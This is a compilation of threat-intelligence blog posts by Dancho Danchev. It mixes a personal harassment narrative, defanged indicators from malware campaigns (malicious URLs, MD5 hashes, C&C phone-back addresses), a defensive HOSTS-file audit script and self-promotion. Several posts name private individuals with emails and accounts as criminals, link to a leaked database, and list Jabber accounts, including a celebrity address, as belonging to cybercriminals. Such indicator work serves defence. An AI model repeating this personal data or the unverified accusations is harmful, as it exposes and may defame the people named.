In 2010 I moved to an apartment located in another town and apparently my apartment has been vandalized including persistent harassment by my neighbors including a possible illegal entry courtesy of the person responsible for hiring the apartment (Kalin Petrov; kalin_petrov@hotmail.com).

After a persistent chase down and harassment courtesy of the person responsible for hiring the apartment I received a notice to leave and had my apartment visited by the person responsible for hiring including another man including another man that was supposedly supposed to take care of my belongings.

Prior to my accommodation I was contacted by Pauline Roberts (pauline.roberts@ic.fbi.gov) who recommended me to Yavor Kolev (javor.kolev@gmail.com) and Albena Spasova (albaadvisors@gmail.com) from Bulgarian local authorities followed by a series of communication.

Prior to returning to my place in 2011 my house was vandalized by three police officers (hxxp://troyan-police.com; police_troyan@abv.bg) from the local police department who entered my house in particular my bedroom and impolitely asked me to dress while showing me a copy of my personal ID that I haven’t presented and taking me to an unknown car without explaining the reason for taking me.
Sample Email communication between me, Pauline Roberts, Javor Kolev and Albena Spasova circa 2010:

Original message sent by Pauline Roberts - 2010

Second email received from Pauline Roberts - 2010

Original message received by Albena Spasova - 2010

Original response issued to Pauline Roberts, Javor Kolev, and Albena Spasova - 2010

Original response issued to Pauline Roberts, Javor Kolev, and Albena Spasova - 2010 - Part Two

Original message received by Albena Spasova - 2010

Original response issued by Javor Kolev - 2010

Original response issued to Javor Kolev - 2010

Original response issued by Javor Kolev - 2010 - Part Two

Original response issued to Javor Kolev - 2010 - Part Two

Original response issued by Javor Kolev - 2010 - Part Three

Original response issued to Javor Kolev - 2010

Original response issued by Javor Kolev - 2010 - Part Four

Original response issued to Javor Kolev - 2010

Original response issued by Javor Kolev - 2010 - Part Five

Original response issued to Javor Kolev - 2010

Original response issued by Javor Kolev - 2010 - Part Six
A few hours later I find myself located in an institution (dpblovech@abv.bg) for a period of three months without anyone explaining the reason for holding me there.

Upon entering I had my phone taken without having received any sort of explanation for taking me and holding me there.

UPDATE: My most recent visit to local police department was to announce a possible food-poisoning and I

was told not to live in my place.

Given these circumstances I feel that it has become highly unproductive to continue my work and therefore I’m currently seeking a permanent relocation including a possible full time career opportunity in the field of cybercrime research security blogger or threat intelligence analyst.

In case you’re aware of someone looking to hire full-time threat intelligence analyst cybercrime researcher or a security blogger feel free to approach me at dancho.danchev@hush.com
Introducing Unit-123.org - Cyber Threat Intelligence Portal (2019-04-12 21:41)

Dear blog readers, I wanted to take the time and effort and introduce you to my latest project called [1]Unit-123.org

where you can find quality research articles in a variety of topics that I will be publishing on a daily basis with the

idea to bring back the spirit of my editorial years and to continue spreading quality data information and knowledge

to a loyal base of users and readers.

Feel free to reach me at dancho.danchev@hush.com

Stay tuned!

1. http://unit-123.org/
Flashpoint Intel Official Web Site Serving Malware - An Analysis (2019-04-22 08:32)

UPDATE: Flashpoint Intel issued a [1]response to my research.

UPDATE: [2]SCMagazine picked up the story.

UPDATE: [3]Anti-Malware.name picked up the story.

UPDATE: [4]EnterpriseTimes picked up the story.

UPDATE: [5]Rambler News picked up the story.

It appears that [6]Flashpoint’s official Web site is currently embedded with a malware-serving malicious script, potentially exposing its visitors to a multitude of malicious software.

Original malicious URL hosting location:

hxxp://www.flashpoint-intel.com/404javascript.js

hxxp://www.flashpoint-intel.com/404testpage4525d2fdc

Related malicious URL redirection chain:

hxxp://www.flashpoint-intel.com

-> hxxp://destinywall.org/redirect?type=555

-> hxxp://ermoyen.tk/index/?4831537102803

-> hxxp://search.plutonium.icu/?utm_medium=7710edb9b

-> hxxp://search.plutonium.icu/?utm_term=66793697539

-> hxxp://search.plutonium.icu/proc.php?37ba8df02c6d

-> hxxp://onwardinated.com/c/5a37c8ad-f104-11e5-9f1f

-> hxxp://circultural.com/v/c3937168-5def-11e9-b07a

-> hxxp://3daa61.circultural.com/l/8c579bd6-2433-11e
Second sample URL redirection chain:

hxxp://www.flashpoint-intel.com/

-> hxxp://destinywall.org/redirect?type=555&

-> hxxp://ermoyen.tk/index/?4831537102803

-> hxxp://search.plutonium.icu/?utm_medium=7710edb9b

-> hxxp://search.plutonium.icu/?utm_term=66793698655

-> hxxp://search.plutonium.icu/proc.php?123dd67462ec

-> hxxp://onwardinated.com/c/5a37c8ad-f104-11e5-9f1f

-> hxxp://circultural.com/v/d45c2e40-5def-11e9-bd47

Related legitimate URL known to have participated in the campaign:

hxxp://boards.greenhouse.io/flashpoint/jobs/4125871002?gh_jid=4125871002

Related malicious URL redirection chain:

hxxp://unanimous.live/ - 104.28.24.233 - hxxp://jsc.adskeeper.co.uk/a/d/adw.toolbar.com.333699.js

hxxp://destinywall.org/redirect?type=555& - 176.123.9.53 -> hxxp://ermoyen.tk/index/?4831537102803 - 37.230.116.105

Related malicious URLs known to have participated in the campaign:


Related malicious domains known to have participated in the campaign:


Related malicious and fraudulent IPs known to have participated in the campaign:

Related malicious MD5s known to have participated in the campaign:


Related malicious and fraudulent URLs known to have participated in the campaign:


Related malicious and fraudulent domains known to have responded to 109.234.39.160:


Related malicious and fraudulent domains known to have responded to 37.230.116.105:

Related malicious and fraudulent domains known to have participated in the campaign (138.68.113.179; 172.64.196.39; 172.64.197.39; 104.27.170.199; 104.27.171.199):


1. https://www.flashpoint-intel.com/blog/after-action-report-flashpoint-remediation-of-0-day-exploit-on-our-public-facing-website/

2. https://www.scmagazine.com/home/security-news/flashpoint-our-site-was-not-dishing-malware/

3. https://www.anti-malware.name/news/expert-accused-intel-flashpoint-website-in-spread-of-malware-while-company-denies-accusations/

4. https://www.enterprisetimes.co.uk/2019/04/26/flashpoint-reacts-to-claim-website-served-malware/

5. https://news.rambler.ru/internet/42088442-sayt-flashpoint-rasprostranyaet-vredonos-flashpoint-net/

6. https://www.flashpoint-intel.com/
Exposing Yet Another Currently Active Fraudulent and Malicious Pro-Hamas Online Infrastructure (2019-05-04 19:45)

Love them or hate them - the ubiquitous beautiful-girl scam campaign courtesy of Hamas, which uses fake, bogus and rogue Facebook accounts to target Israeli soldiers, has to come to an end.

In this post I’ll provide actionable intelligence on a currently active Pro-Hamas malicious and fraudulent infrastructure, discuss in depth the tactics, techniques and procedures of the cybercriminals behind it, and offer an in-depth perspective on a currently active Pro-Hamas hosting provider - "[1]Nepras for Media & IT" - which is basically a legitimate front-end company currently involved in a variety of Pro-Hamas malicious and fraudulent malware-serving and propaganda-spreading online infrastructure, a provider directly related to yet another Pro-Hamas franchise - "Modern Tech Corp".

Sample Facebook Profile Names involved in the campaign:

Elianna Amer

Aitai Yosef

Karen Cohen

Amit Cohen

Loren Ailan

Verena Sonner

Lina Kramer

Sample profile photos of Pro-Hamas fake and rogue Facebook accounts:
Sample malicious and fraudulent URL known to have participated in the campaign:

hxxp://apkpkg.com/android/?product=yeecallpro - 50.63.202.43; 50.87.148.131; 50.63.202.56

Related malicious MD5s known to have participated in the campaign:


Related malicious and fraudulent domains known to have participated in the campaign:

hxxp://goldncup.com

hxxp://glancelove.com - 204.11.56.48; 198.54.117.1; 198.54.117.198; 198.54.117.200; 198.54.117.197; 192.64.118.163

hxxp://autoandroidup.website

hxxp://mobilestoreupdate.website

hxxp://updatemobapp.website

Related malicious IPs known to have participated in the campaign:

hxxp://107.175.144.26

hxxp://192.64.114.147
Related malicious MD5s known to have participated in the campaign:


Related malicious and fraudulent phone-back C&C server IPs:

hxxp://endpointup.com/update/upfolder/updatefun.php

hxxp://droidback.com/pockemon/squirtle/functions.php

Related malicious and fraudulent domains known to have participated in the campaign:

hxxp://androidbak.com

hxxp://droidback.com

hxxp://endpointup.com

hxxp://siteanalysto.com

hxxp://goodydaddy.com

Related emails known to have participated in the campaign:

info@palgoal.ps

support@nepras.com

mtcg@mtcgaza.com

Related fraudulent and malicious domains known to have been registered using the same email - info@palgoal.ps:


Related fraudulent and malicious domains known to have been registered using the same email - support@nepras.com:


Related domains registered using "Nepras for Media & IT" infrastructure:

Related domains registered using the "Modern Tech Corp" Pro-Hamas fraudulent and malicious infrastructure:

Related malicious MD5s known to have participated in the campaign:


Related certificates known to have participated in the campaign:

Related malicious MD5s known to have participated in the campaign including C&C phone-back locations:

MD5: 8f1b709ae4fb41b32674ca8c41bfcbf7 - once executed the sample phones back to the following malicious domain - hxxp://jonalbertwebsite.000webhostapp.com

MD5: 95a782bd8711ac14ad76b068767515d7 - once executed the sample phones back to the following malicious domains - hxxp://107.175.144.26/apps/d/p/op.php -> hxxp://app-measurement.com/config/app/1:487050065789:android:6a899b85b4fafd55?app_instance_id=76d4b711c98c3632398d47cb8d5777a3&platform=android&gmp_version=11200

MD5: 5b2aac6372dea167c737b0036e1bd515

MD5: f6ffa064a492e91854d35e7f225b1313 - once executed the sample phones back to the following malicious domain - hxxp://192.64.114.147/apps/d/p/op.php

MD5: b3e40659ae0a0852e2f6eb928d402d9d

MD5: 7a9503152b4c8c1ee80ac7daf5405a91

Related malicious MD5s known to have participated in the campaign:


Related malicious URL known to have participated in the campaign:

hxxp://bit.ly/2M7E2Zg

1. https://www.terrorism-info.org.il/Data/articles/Art_20397/E_188_12_177323293.pdf

Historical OSINT - Profiling the Loads.cc Enterprise (2019-05-04 22:27)

Remember [1]loads.cc? In this post I’ll provide actionable intelligence on the popular DDoS-for-hire service circa 2008 and offer an in-depth perspective on the tactics utilized by the gang behind the service for the purpose of earning fraudulent revenue in the process of monetizing access to malware-infected hosts.

Sample malicious and fraudulent infrastructure known to have participated in the campaign:

hxxp://loads.cc - hxxp://ns1.udnska.cn (72.21.52.99). Interestingly, hxxp://sateliting.cn is the C&C for the hxxp://loads.cc service.

Related malicious and fraudulent URLs known to have participated in the campaign:


Related malicious IPs known to have responded to sateliting.cn:


Related malicious MD5s known to have participated in the campaign:


1. https://ddanchev.blogspot.com/2008/03/loadscc-ddos-for-hire-service.html

Historical OSINT - Massive Scareware Serving Campaign Spotted in the Wild (2019-05-04 22:41)

With scareware continuing to proliferate, I’ve recently intercepted a currently active malicious and fraudulent blackhat SEO campaign successfully enticing thousands of users into interacting with the rogue and malicious software, with the scareware behind the campaign successfully modifying the HOSTS file on the affected host, potentially exposing the user to a variety of fake search engines and related rogue, fraudulent and malicious activity.

In this post I’ll provide actionable intelligence on the infrastructure behind the campaign.

Sample malicious URL known to have participated in the campaign:

hxxp://guardsys-zone.com/?p=WKmimHVmaWyHjsbIo22EeXZe0KCfZlbVoKDb2YmHWJjOxaCbkX1%2Bal6orKWekJXIZWhimmVummWIo6THodjXoGJdpqmikpVuZ21uaHFtb1%2FEkKE%3D

Sample malicious MD5 known to have participated in the campaign:

MD5: 665480a64d4f72a33120251c968e9c28

Once executed, the sample modifies the HOSTS file and redirects affected users to the following domains:

hxxp://google-reseach.com/gfeed/click.php?q=&p=1 - 66.36.243.201

hxxp://google-reseach.com/search.php?&aff=32210&saff=0&q=
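A defender can audit a HOSTS file for the kind of tampering described above. The following is an added example, not code from the original post: the watch-list of search-engine hostnames and the sample file contents are constructed assumptions (the post does not say which hostnames the sample rewrites), and only the IP 66.36.243.201 is taken from the post.

```python
import ipaddress

# IP the post associates with the rogue search domain google-reseach.com.
KNOWN_BAD_IPS = {"66.36.243.201"}

# Assumption: hostnames a search-hijacking sample is likely to override.
WATCHED_SUFFIXES = ("google.com", "bing.com", "yahoo.com")

# Constructed sample HOSTS content, for illustration only.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
66.36.243.201   www.google.com google.com   # constructed entry
66.36.243.201   search.yahoo.com
192.0.2.10      WWW.BING.COM.               # constructed, documentation-range IP
0.0.0.0         ads.example.net
# 66.36.243.201 www.google.co.uk  (commented out, must be ignored)
"""


def parse_hosts(text):
    """Yield (line_no, ip, [hostnames]) for every active HOSTS entry."""
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()      # drop full-line and inline comments
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue                             # address without any hostname
        try:
            ip = ipaddress.ip_address(fields[0])  # accepts IPv4 and IPv6
        except ValueError:
            continue                             # first field is not an IP address
        # Normalise case and a trailing root dot so comparisons are reliable.
        yield line_no, ip, [h.lower().rstrip(".") for h in fields[1:]]


def is_watched(hostname):
    """True if hostname is a watched domain or one of its subdomains."""
    return any(hostname == s or hostname.endswith("." + s)
               for s in WATCHED_SUFFIXES)


def audit_hosts(text):
    """Return a list of (line_no, hostname, ip, reason) findings."""
    findings = []
    for line_no, ip, names in parse_hosts(text):
        for name in names:
            if str(ip) in KNOWN_BAD_IPS:
                findings.append((line_no, name, str(ip), "known-bad-ip"))
            elif is_watched(name) and not (ip.is_loopback or ip.is_unspecified):
                # A search domain pinned to a routable address bypasses DNS.
                findings.append((line_no, name, str(ip), "search-domain-override"))
    return findings


if __name__ == "__main__":
    for line_no, name, ip, reason in audit_hosts(SAMPLE_HOSTS):
        print(f"line {line_no}: {name} -> {ip} [{reason}]")
```

On Windows the file to feed in is normally %SystemRoot%\System32\drivers\etc\hosts; entries pointing a watched name at loopback or 0.0.0.0 are treated as sinkholes rather than redirects.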

Related malicious rogue and fraudulent URL known to have participated in the campaign:

hxxp://88.85.73.139/landing/

Sample rogue and fraudulent payment processor used in the campaign:

hxxp://safetyself.com/safereports/ - 88.85.73.139

Historical OSINT - Yet Another Massive Scareware Serving Campaign Courtesy of the Koobface Gang (2019-05-05 16:47)

It’s 2010 and I’ve recently intercepted a currently circulating malicious and fraudulent scareware-serving campaign courtesy of the Koobface Gang, this time successfully typosquatting my name within its command and control infrastructure.

In this post I’ll provide actionable intelligence behind the campaign and will discuss in depth the infrastructure behind it.

Sample malicious and fraudulent domains known to have participated in the campaign:

hxxp://qjcleaner.eu/hitin.php?affid=02979

Sample malicious MD5 known to have participated in the campaign:

MD5: 8df3e9c50bb4756f4434a9b7d6c23c8c

Once executed a sample malware phones back to:

hxxp://212.117.160.18/install.php?id=02979

which is basically our dear friends at AS44042 ROOT-AS root eSolutions

Parked at the same IP where [1]Crusade Affiliates continue serving a diverse set of fake security software are

also [2]more scareware domains.

It’s also worth pointing out that the Koobface gang has recently started typosquatting various domains using my name. The Koobface gang is [3]typosquatting my name for registering domains ([4]for instance Rancho Ranchev; Pancho Panchev etc.) including hxxp://mayernews.com - which is registered to Danchev Danch (1andruh.a1@gmail.com).

1. https://ddanchev.blogspot.com/2009/09/koobface-botnets-scareware-business.html

2. https://ddanchev.blogspot.com/2010/05/koobface-gang-responds-to-10-things-you.html

3. https://ddanchev.blogspot.com/2009/08/movement-on-koobface-front-part-two.html

4. https://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.html

Historical OSINT - Yet Another Massive Scareware-Serving Campaign Courtesy of the Koobface Gang (2019-05-05 17:19)

It’s 2010 and I’ve recently come across yet another currently active scareware-serving campaign courtesy of the Koobface gang, this time successfully introducing a CAPTCHA-breaking module, potentially improving the propagation and distribution scale within major social networks.

In this post I’ll discuss the campaign and provide actionable intelligence on the infrastructure behind it.

Related malicious domains known to have participated in the campaign:

hxxp://goscandir.com/?uid=13301 - 91.212.107.103 - hosting courtesy of [1]AS29550 - EUROCONNEX-AS Blueconnex Networks Ltd Formally Euroconnex Networks

hxxp://ebeoxuw.cn/?uid=13301

hxxp://ebiezoj.cn/22/?uid=13301

hxxp://goscanhand.com/?uid=13301

hxxp://byxzeq.cn/22/?uid=13301

Sample malicious MD5 known to have participated in the campaign:

MD5: 16575a1d40f745c2e39348c1727b8552

Once executed a sample malware phones back to:

hxxp://in5it.com/download/Ipack.jpg - the actual executable

Related malicious MD5 known to have participated in the campaign:

MD5: 1d5e3d78dd7efd8878075e5dbaa5c4fd

Related malicious MD5 known to have participated in the campaign:

MD5: 6262c0cb1459adc8f278136f3cff2777

It’s worth pointing out that prior to analyzing the campaign it appears that the Koobface gang has recently introduced a CAPTCHA-breaking module which basically relies on the active outsourcing of the CAPTCHA-breaking process, potentially improving the Koobface spreading and propagation effectiveness.

Sample malicious URL known to have participated in the campaign:

http://peacockalleyantiques.com/.sys/?getexe=v2googlecheck.exe

Sample malicious MD5 known to have participated in the campaign:

MD5: cf9729bf3969df702767f3b9a131ec2c

Sample malicious URL known to have participated in the campaign:

http://peacockalleyantiques.com/.sys/?getexe=v2captcha.exe

Sample malicious MD5 known to have participated in the campaign:

MD5: f2d0dbf1b11c5c2ff7e5f4c655d5e43e

Once executed a sample phones back to the following C&C server IPs:

hxxp://capthcabreak.com/captcha/?a=get&i=0&v=14 - 67.212.69.230

hxxp://captchastop.com/captcha/?a=get&i=1&v=14 - 67.212.69.230

1. https://ddanchev.blogspot.com/2009/08/movement-on-koobface-front-part-two.html

Offensive Warfare 2.0 - The Future of Cyber Warfare - Hacking and Cyber Security Community - Public Registration Now Open! (2019-05-15 10:33)

Dear blog readers,

I wanted to let you know of my newly launched hacking and security community - [1]Offensive Warfare 2.0 -

The Future of Cyber Warfare - Hacking and Cyber Security Community - with public registration now open.

How you can help?

- Register today!

- Share this post with friends and colleagues.

- Approach me at dancho.danchev@hush.com with your comments, feedback and general suggestions

Stay tuned!

1. https://offensive-warfare.com/

Proprietary Threat Intelligence Reports Available On Demand - Request a Copy Today! (2019-05-28 20:46)

Dear blog readers - I wanted to let everyone know of two – currently in the works – proprietary Threat Intelligence type of reports - that you and your organization can easily acquire on demand. The first report details in depth, including tactics, techniques and procedures and hundreds of IOCs (Indicators of Compromise), the Pay-Per-Install Business Model circa 2008 - worth $1,500 - and the second report, which is also available on demand, details the inner workings of the CAPTCHA-Solving Underground Market Business Model - which is also worth $1,500.

Similar to my most recent – now publicly available – report on "[1]Assessing The Computer Network Operation (CNO) Capabilities of the Islamic Republic of Iran - Report" capabilities, including a complimentary social network graph - the proprietary Threat Intelligence reports can be requested online - and the user including the organization will receive a complimentary copy of the report - including a possible attribution vector - within 30 days prior to making a purchase.

How you can order a copy of the report?

Feel free to approach me at dancho.danchev@hush.com to inquire about making a purchase.

Stay tuned!

1. https://ddanchev.blogspot.com/2015/07/assessing-computer-network-operation_29.html


Proprietary Cybercrime and Dark Web Forum Search Engine - BETA Access Available! (2019-05-28 20:48)

Dear blog readers - I wanted to let everyone know of a currently active BETA project - namely - the general invite-

only proprietary access to a Cybercrime and Dark Web Underground Forum Search Engine - exclusively targeting

Security Vendors the U.S Intelligence Community and Law Enforcement including independent-vetted invite-only

subscription-based access to the World’s largest and near-real-time repository of Cybercrime Research Data - worth

$3,500 in the form of one-time payment - for the purpose of fueling growth into the project - and to request the

necessary access - including possible subscription-based agreement - further fueling growth into the project and the

quality of the inventory of data.

How to request access?

Feel free to approach me at dancho.danchev@hush.com with your inquiry in terms of this project.

Stay tuned!

Dancho Danchev’s Blog - Public Comments Now Open! (2019-05-29 08:38)

Dear blog readers,

Ever since 2005 where I originally launched this blog - I decided to turn off public comments so that I can

present a decent portion of my Information Security knowledge to a diverse set of audiences. Back in the glorious

Web 2.0 years when I was busy doing business development and PR outreach for a variety of Security Projects I’ve

recently decided that the time has come to open public comments on one of the Security Industry’s most popular

personal blogs on Information Security Cybercrime Research and Threat Intelligence with the idea to reach out to

everyone reading this blog potentially building a high-quality comment and research feedback network of Security

Industry members U.S Intelligence Community members and the general public.

Looking forward to receiving your comments - and as always feel free to go through the archives to catch up

with what I’ve been up to.

Stay tuned!

Dancho Danchev’s Blog - Audio Version Available - Listen to Every Post! (2019-05-30 16:15)

Dear blog readers,

I wanted to let everyone know that I’ve recently introduced an audio-listening functionality to every blog post

basically allowing you to listen to every blog post on this blog. What do you think?

Basically it allows you to easily plug and play your head-set and listen on current historical and upcoming

posts. Stay tuned for an updated set of features to be implemented anytime soon.

Consider going through the following high-profile Security Interviews which I managed to produce throughout

2003-2006 while working for [1]Astalavista Security Group.

- [2]Security Interviews 2004/2005 - Part 1

- [3]Security Interviews 2004/2005 - Part 2

- [4]Security Interviews 2004/2005 - Part 3

including the following commentary and Open Letter to the U.S Intelligence Community:

- [5]The Threat Intelligence Market Segment - A Complete Mockery and IP Theft Compromise - An Open Letter to the U.S Intelligence Community

Enjoy and stay tuned!

1. https://packetstormsecurity.com/files/author/3007/

2. https://ddanchev.blogspot.com/2006/01/security-interviews-20042005-part-1.html

3. https://ddanchev.blogspot.com/2006/01/security-interviews-20042005-part-2.html

4. https://ddanchev.blogspot.com/2006/01/security-interviews-20042005-part-3.html

5. https://ddanchev.blogspot.com/2019/01/the-threat-intelligence-market-segment.html

Upcoming Security Project - Accepting Donations and Feedback! (2019-05-30 17:11)

Dear blog readers, I wanted to let everyone know that I’ve recently added a "Donate Today!" button including a Pop-Up banner within my blog with the idea to [1]seek your donations and feedback to raise the necessary capital for an upcoming Security Project.

How you can contribute in case you’re a long-time reader of this blog - and want to possibly see more high-

quality Security and Cybercrime research? Consider making a modest $500 donation - which will better help me to

scale the project and eventually launch it.

Feel free to approach me at dancho.danchev@hush.com

Stay tuned!

1. https://form.jotformeu.com/91473099551363

Upcoming Offensive Warfare 2.0 Cyber Security and Hacking Community YouTube Livestream Broadcast - RSVP Today! (2019-07-02 11:17)

Dear blog readers,

I wanted to let everyone know that I’ll be doing a Live YouTube Broadcast - this Friday - 05/07/2019 20:30

P.M - Eastern European Summer Time (EEST), UTC +3 in terms of [1]my newly launched Offensive Warfare 2.0 -

Cyber Security and Hacking Community. Are you interested in attending and learning more about the project?

[2]RSVP Today and consider [3]registering to get the conversation going!

Feel free to approach me at dancho.danchev@hush.com

Stay tuned!

1. https://www.offensive-warfare.com/blogs/entry/1-offensive-warfare-20-official-community-launch-announcement/?ct=1562058688

2. https://offensive-warfare.app.rsvpify.com/

3. https://www.offensive-warfare.com/register

Exposing Bulgaria’s Largest Data Leak - An OSINT Analysis (2019-07-27 10:46)

I’ve recently come across a news article detailing the recently leaked Bulgaria NAP records database and I decided to take a closer look. What does this leak basically constitute? Basically the attacker managed to compromise the security of the Web Site, basically leading to a successful extraction of a decent portion of data which could basically constitute a leak.

NOTE: The data in this analysis has been obtained using public sources.

In this post I’ll profile a novice Bulgaria-based cybercriminal that basically managed to obtain access to the database and shared it within several cybercrime-friendly forum communities, making it publicly accessible, including an in-depth overview of TAD Group, which is basically a Bulgaria-based penetration testing company.

Real Name: Daniel Ganchev - Email: daniel.ganchev@abv.bg

Sample URL of the cybercriminal involved in the campaign:

hxxp://instakilla.com/ - Email: wp@instakilla.com; info@instakilla.com

Instagram Account: hxxp://www.instagram.com/instakilla_/

Bitcoin address used in the campaign: 3Ex6LeHorgRjkBmws4SsRZ3FXSJDXk5FhP

Sample additional domain known to have been used by the same individual: hxxp://209.250.232.143

Related URLs known to have participated in the campaign:

https://instakilla.com/5k.txt

https://instakilla.com/teaser.txt

Sample Screenshot of the Original Letter Sent to Journalists:

Let’s take a closer look at the Bulgaria-based TAD Group, which is basically a well-known penetration testing company currently running Bulgaria’s largest and most popular hacking forum community - hxxp://www.xakep.bg - which was recently blamed for Bulgaria’s largest database leak, in particular its founders and several employees, in the context of performing an OSINT analysis basically highlighting some of the key functions of the company and its involvement in the incident.

Sample Company Logo:

Sample Hacking Forum Logo:

Sample Exploits Developed courtesy of the founder of the group:

Sample Photos of TAD Group Employees:

Sample TAD Group Photos:

Related personally identifiable information of TAD members:

Real Name: Ivan Todorov

Email: todorov_i@tadgroup.com; todorov_i@subway.bg

Related social network accounts:

hxxp://github.com/chapoblan

hxxp://www.facebook.com/chapoblan/

Sample Bulgaria Leaked Database URL:

hxxp://uploadfiles.io/s1p3gzh8

Sample Email known to have been used in the campaign:

Email: minfin_leak@yandex.ru

Sample MD5 known to have been used in the campaign:

MD5: 3125f2f04d3bac84c418ceb321959aba

It’s also worth pointing out that I’ve managed to come across a fraudulent proposition courtesy of the hxxp://www.xakep.bg cybercrime-friendly forum community with the cybercriminal behind it currently soliciting managed hacker-for-hire type of services.

Sample screenshots courtesy of the service:

We’ll be keeping an eye on the campaign and we’ll post updates as soon as new developments take place.

Who’s Behind the Syrian Electronic Army? - An OSINT Analysis (2019-07-28 18:19)

Continuing the "[1]FBI Most Wanted Cybercriminals" series, I’ve decided to continue providing actionable threat intelligence on some of the most prolific and wanted cybercriminals in the World.

Following a series of high-profile Web site defacement and social media attack campaigns largely relying on

the utilization of good-old-fashioned social engineering attack campaigns - it appears that the individuals behind the

Syrian Electronic Army are now part of [2]FBI’s Most Wanted Cyber Watch List which means that I’ve decided to

conduct an [3]OSINT analysis further sharing actionable intelligence behind the group operators with the idea to

assist law enforcement and the U.S Intelligence Community with the necessary data which could lead to a successful

tracking down and prosecution of the team behind these campaigns.

In this post I’ll provide actionable intelligence on the group behind the Syrian Electronic Army including actionable intelligence on the infrastructure on some of their most prolific social engineering driven campaigns.

Sample Personal Photo of Ahmad Al Agha:

Sample Personal Photo of Firas Nur Al Din Dardar:

Sample Web Site Defacement Screenshot courtesy of "The Shadow":

Sample Screenshots of the Syrian Electronic Army Web Site Defacement Activity:

Related domains known to have participated in the campaign:


Related IPs known to have participated in the campaign:

Social Media Accounts:

Skype account IDs known to have participated in the campaign:

Related emails known to have participated in the campaign:

We’ll continue monitoring the campaign and post updates as soon as new developments take place.

1. https://ddanchev.blogspot.com/2019/01/exposing-irans-most-wanted.html

2. https://www.fbi.gov/wanted/cyber/ahmed-al-agha

3. https://www.fbi.gov/wanted/cyber/firas-dardar
Profiling a Currently Active Portfolio of High-Profile Cybercriminal Jabber and XMPP Accounts

In a world dominated by [1]fraudulent propositions, it should be noted that Jabber and XMPP, largely relying on [2]Off-The-Record type of functionality, remain the primary secure communication channel for a large portion of the cybercrime-friendly propositions that I come across on a daily basis.

I’ve recently come across a public list of harvested and data-mined high-profile cybercriminals' Jabber accounts, and I’ve decided to share it with my blog readers for the purpose of establishing the foundations for successful "[3]lawful surveillance" and "[4]lawful interception" type of operational activity.

insidepro@exploit.im

insider89@einfachjabber.de

insider@richim.org

insidious _admin@exploit.im

insomnia _barnaul1@jabber.se

inspector@default.rs

inspiration@sj.ms

inspiration@xmpp.jp

inspiration@xmpp.zone

insside@draugr.de

instal-user@jabbim.sk

installs4sale@jabber.no

instand@exploit.im

instantbank@xmpp.jp

institches@madriver.net

int0x8@exploit.im

int2eh@exploit.im

int3@exploit.im

int@jabber.ccc.de

intactdev@exploit.im

intel-core@exploit.im

interconnect0r@jabber.otr.im

interconnector@jabber.otr.im

interconnector@sigaint.org

internal@riseup.net

internetalphawolf@jabber.dol.ru

internozlo@exploit.im

interprice@exploit.im

intertexnika@xmpp.jp

invas0r@xmpp.ru

invi@exploit.im

invis77@embargo.ucoz.su

invis@swissjabber.ch

invisi@darkjabber.cc

invite@coru.ws

inwhen500@exploit.im

ioann@0nl1ne.at

iod@jabber.systemli.org

ip3rt3ck1@xmpp.jp

ipf.group@0nl1ne.at

ipfree@jabber.org.uk

iplaygod@xmpp.jp

iptvking@dukgo.com

ipwn@cih.ms

iqebo@xmpp.jp
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iqualone@jabber.co.nz

irapez@cnw.su

irhabi@jabber.de

irlik82@qip.ru

ironchicken@jabber.earth.li

irondimon@jabber.ru

iru@exploit.im
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synergyloader@jabber.root.cz

synestergates@jabbim.sk

synflod@exploit.im

synthet1x@xmpp.jp
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t.shelby@exploit.im

t0r@exploit.im
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tailandready@xmpp.jp
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tarantino6@jabber.ru
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tashe@jabbim.cz
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tatomato@xmpp.jp
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tdmk _gr@exploit.im

tdos.cc@exploit.im

tdp@kikoo.louiz.org
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tenzor@creep.im
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tequilaa@exploit.im

tequilaa@jabbim.cz

terfour@xmpp.jp

teri@jabber.se
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terybookers@xmpp.jp

tesla@thesecure.biz

teslo911@jabber.ru

teslo@neko.im

tess88@exploit.im

tessa88@exploit.im

tessa88@xmpp.jp
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tfs@exploit.im
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the _reeper@jabber.org
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thechef@xmpp.jp

thechris@exploit.im

thedonation@jabber.org

theevildark@jabber.ru

thefaico@elbinario.net

thefaico@suchat.org

thefighter@xmpp.jp

thefinalstrawradio@riseup.net

thefrody@dukgo.com

thehustler@exploit.im

thelastmonk@jabbim.cz
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thelovebug@micro.thelovebug.org

theman718@xmpp.jp
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thepackage@cnw.su
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thetick@jabberon.ru
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thewanda@see.ph
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thiefy@crypt.am
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thug@jabber.cz
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tifma6n@jabber.org

tiger1977@xmpp.jp

tihuy@dlab.im

tiirz@0nl1ne.at
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tillz@jabber.org

tilstoi@exploit.im

timcook@icloud.com
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timeismoney@xmpp.ru

timex@jabber.at

timofeloff@exploit.im
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timomas@mpro.la

timon666 _333@xmpp.ru

timon@topsec.in
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tiro@jabber.no
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titan-jp@xmpp.jp

titanium@jabme.de

titlepr-adv@jabber.ru
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tjroy@jabber.me

tkabber@jabber.ru
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tldodo@cnw.su
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tmt@darkjabber.su
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tokkinni@exploit.im

tokyo6712@xmpp.jp
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tomfort@jabber.ru
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tomkenzey@jabber.cz

tommyd@exploit.im

tommyva@xmpp.jp
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tonghuix@jabber.gnome.org
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tonnysapranno@draugr.de
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tony@jabbim.sk

tony _montana@jabber.ccc.de

tonybandz@exploit.im

tonys@riseup.net

tonyspark@0nl1ne.at
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toopka@xmpp.jp
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torpila@exploit.im

torrid@jaim.at
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tortudemer@jappix.com
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toure@exploit.im

tourico@xmpp.jp

toxi _roman@jabber.ru
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tr4ck@xmpp.jp
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trackz@mpro.la

trackz@pkey.in

tracz@jabber.ru
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tradelik@mynet.com

traf _graf@exploit.im
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trafficsale@zae-biz.com
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traffsell@draugr.de
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traffstoc@jabber.org
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trapordie2000@exploit.im
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travelopia@xmpp.jp
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triarius@xabber.de

trickster@rows.io

trigger77@xmpp.jp

triggerhappy@jabber.ccc.de

trilliumcrypter@jabbim.com

trilobittt@wtfismyip.com

triph0rce@riseup.net

triptamin@exploit.im

trisoft@zloy.im

trixbunneh@exploit.im

trm@jabber.ru

tro9n@jabber.cz

trojan@digitalgangster.com

trolex@wwh.so

trondoe@jabber.at

tronlegacy@jabber.de

tronwolf@swissjabber.ch

trops@exploit.im
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troy@wtfismyip.com

troymathz@jwchat.org
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truer@xmpp.jp
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trump3d@exploit.im
